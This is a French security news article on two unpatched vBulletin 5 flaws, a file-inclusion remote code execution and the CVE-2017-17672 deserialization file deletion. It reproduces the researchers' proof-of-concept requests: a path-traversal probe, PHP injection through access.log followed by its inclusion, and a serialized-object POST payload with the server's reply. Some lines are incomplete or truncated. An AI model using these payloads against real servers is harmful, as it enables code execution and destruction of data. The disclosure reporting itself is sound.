Des chercheurs en sécurité ont découvert et divulgué des détails de deux vulnérabilités critiques non corrigées dans vBulletin un forum Internet très populaire qui pourrait permettre à un attaquant distant d’exécuter un code malveillant sur la dernière version de vBulletin.
Les vulnérabilités ont été découvertes par un chercheur de sécurité de la firme de sécurité basée en Italie TRUEL IT et un chercheur en sécurité indépendant inconnu, qui a divulgué les détails de la vulnérabilité par le programme de divulgation sécurisé SecuriTeam Beyond Security.
Les vulnérabilités affectent la version 5 du forum vBulletin qui reste encore non corrigées à ce jour.
La première vulnérabilité découverte dans vBulletin est un problème d’inclusion de fichiers qui conduit à l’exécution de code à distance, ce qui permet à un attaquant distant d’inclure un fichier à partir du serveur vBulletin et exécuter du code PHP arbitraire.
La faille d’execution de code à distance
Un attaquant non authentifié peut déclencher la vulnérabilité d’inclusion de fichiers en envoyant une requête GET à index.php avec le paramètre routestring, ce qui permet éventuellement à l’attaquant de « créer une requête spécialement conçue au serveur Vbulletin installé sous Windows OS et inclure n’importe quels les fichiers sur le serveur Web. » Le chercheur a également fourni un Proof-of-Concept (PoC) pour montrer l’exploitation de la vulnérabilité.
Proof-of-Concept (PoC)
Nous pouvons vérifier si le serveur est vulnérable en envoyant la requête GET suivante:
|
1 |
/index.php?routestring=.\\ |
Si la reponse est
Le serveur est vulnérable.
Si nous voulons injecter un code php à tout fichier sur le serveur, nous pouvons utiliser le access.log par exemple:
|
1 |
/?LogINJ_START=<?php phpinfo();?>LogINJ_END |
Après cela, nous pouvons inclure access.log avec notre code PHP:
|
1 |
/index.php?routestring=\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\xampp\\apache\\logs\\access.log |
La faille de suppression de fichier arbitraire à distance
La seconde vulnérabilité découverte dans la version du logiciel forum vBulletin 5 a été attribué CVE-2017-17672 et décrit comme un problème de désérialisation qu’un attaquant non authentifié peut exploiter pour supprimer des fichiers arbitraires et même exécuter du code malveillant « dans certaines circonstances. »
Cette vulnerabilité est due à l’usage de la fonction unserialize() de PHP, ce aui permet à une personnes malveillante de supprimer des fichiers sur le serveur ou d’y executer un code.
Proof-of-Concept (PoC)
En envoyant la requête POST suite d’ un attaquant non authentifié peut supprimer des fichiers du serveur victimes
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 |
POST /vb533/ajax/api/template/cacheTemplates HTTP/1.1 Host: vb533.test Pragma: no-cache Cache-Control: no-cache User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36 Upgrade-Insecure-Requests: 1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: it-IT,it;q=0.8,en-US;q=0.6,en;q=0.4 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 125 templates[]=1&templateidlist=O:20:"vB_Image_ImageMagick":1:{s:20:"%00*%00imagefilelocation";s:1 |
le serveur répondra avec:
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 |
HTTP/1.1 200 OK Date: Fri, 27 Oct 2017 09:27:52 GMT Server: Apache/2.4.18 (Ubuntu) Set-Cookie: sessionhash=409d8f4b16ebb55471e63509834d0eff; path=/; HttpOnly Set-Cookie: lastvisit=1509096472; path=/; HttpOnly Set-Cookie: lastactivity=1509096472; path=/; HttpOnly Set-Cookie: sessionhash=44b1e8d2d433031ec2501649630dd8bf; path=/; HttpOnly Cache-Control: max-age=0,no-cache,no-store,post-check=0,pre-check=0 Expires: Sat, 1 Jan 2000 01:00:00 GMT Last-Modified: Fri, 27 Oct 2017 09:27:52 GMT Pragma: no-cache Vary: Accept-Encoding Content-Length: 2101 Connection: close Content-Type: application/json; charset=UTF-8 {"errors":[["unexpected_error","Cannot use object of type vB_Image_ImageMagick as array"]]} |
commentaires
Chargement & hellip;